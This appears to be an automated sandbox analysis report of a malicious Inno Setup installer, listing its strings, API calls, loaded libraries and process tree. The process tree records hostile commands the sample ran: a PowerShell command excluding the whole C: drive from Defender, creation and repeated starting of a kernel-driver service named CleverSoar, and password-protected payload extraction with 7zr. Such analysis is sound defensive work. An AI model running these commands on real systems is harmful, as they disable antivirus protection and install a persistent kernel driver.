Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00CA6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00CA7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW
Strings found in binary or memory; sources: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000003.1764353867.0000000004230000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr:
  • http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
  • http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
  • http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
  • http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
  • http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
  • http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
  • http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
  • http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
  • http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
  • http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
  • http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
  • http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
  • http://ocsp.digicert.com0A
  • http://ocsp.digicert.com0C
  • http://ocsp.digicert.com0H
  • http://ocsp.digicert.com0I
  • http://ocsp.digicert.com0X
  • http://www.digicert.com/CPS0
  • http://www.digicert.com/ssl-cps-repository.htm0
(These are the AIA, CRL, OCSP and CPS URLs of a DigiCert EV code-signing and timestamping certificate chain embedded in the dropped files' Authenticode signatures, not network indicators; the trailing "0E", "0C" and similar characters are DER length bytes picked up by the string scan. That the dropped .vbc files and 7zr.exe all carry the same chain is worth checking with a signature verifier rather than assuming the signature is valid.)
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe; String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Strings found in binary or memory; sources: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, 00000000.00000003.1676606291.000000007EEDB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, 00000000.00000003.1675936852.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000000.1678022236.0000000000221000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000000.1767147398.00000000006ED000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.0.dr, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.5.dr:
  • https://www.innosetup.com/
  • https://www.remobjects.com/ps
(The jrsoftware.org, innosetup.com and remobjects.com strings come from the Inno Setup installer stub and its Pascal Script engine; the /VERYSILENT and /SL5= arguments in the process tree are standard Inno Setup switches, which is consistent with the "installer" file name.)

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Process information set: 01 00 00 00 (a DWORD value of 1; this is the call behind the "Protects its processes via BreakOnTermination flag" signature above. With that flag set, terminating the process bugchecks the machine, so killing it from Task Manager or an EDR console will crash the host rather than stop the malware.)

System Summary

Source: update.vbc.1.drStatic PE information: section name: .aQ#
Source: update.vbc.6.drStatic PE information: section name: .aQ#
Source: hrsw.vbc.6.drStatic PE information: section name: .aQ#
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6BF73886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF73886
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C0F8810 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,6_2_6C0F8810
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C0F9450 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6C0F9450
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6BF73A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF73A6A
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6BF739CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF739CF
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6BF73D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF73D62
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6BF73D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF73D18
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6BF73C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF73C62
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6BF71950: CreateFileA,DeviceIoControl,CloseHandle,6_2_6BF71950
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6BF74754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,6_2_6BF74754
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process token adjusted: Security
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00CA1E40 appears 82 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00D3FB10 appears 720 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00CA28E3 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp | Code function: String function: 6C1C9F10 appears 415 times
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp | Code function: String function: 6C12C240 appears 31 times
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.5.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.0.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.5.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, 00000000.00000003.1676606291.000000007F1DA000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileName e4dAHlygzris.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, 00000000.00000000.1674452844.0000000001089000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileName e4dAHlygzris.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, 00000000.00000003.1675936852.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileName e4dAHlygzris.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe | Binary or memory string: OriginalFileName e4dAHlygzris.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.dr | Binary string: \Device\TfSysMon
Source: tProtect.dll.12.dr | Binary string: \Device\TfKbMonPWLCache
Source: classification engine | Classification label: mal96.evad.winEXE@146/31@0/0
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp | Code function: 6_2_6C0F9450 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00CA9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00CB3D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00CA9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp | Code function: 6_2_6C0F8930 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,Process32NextW
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp | File created: C:\Program Files (x86)\Windows NT\is-TCRTM.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe | File created: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe | Virustotal: Detection: 8%
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe | String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe | File read: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp "C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp" /SL5="$20442,6283511,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe"
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp "C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp" /SL5="$302A6,6283511,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe Process created: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp "C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp" /SL5="$20442,6283511,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe"
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Process created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe Process created: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp "C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp" /SL5="$302A6,6283511,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: bcp47langs.dll
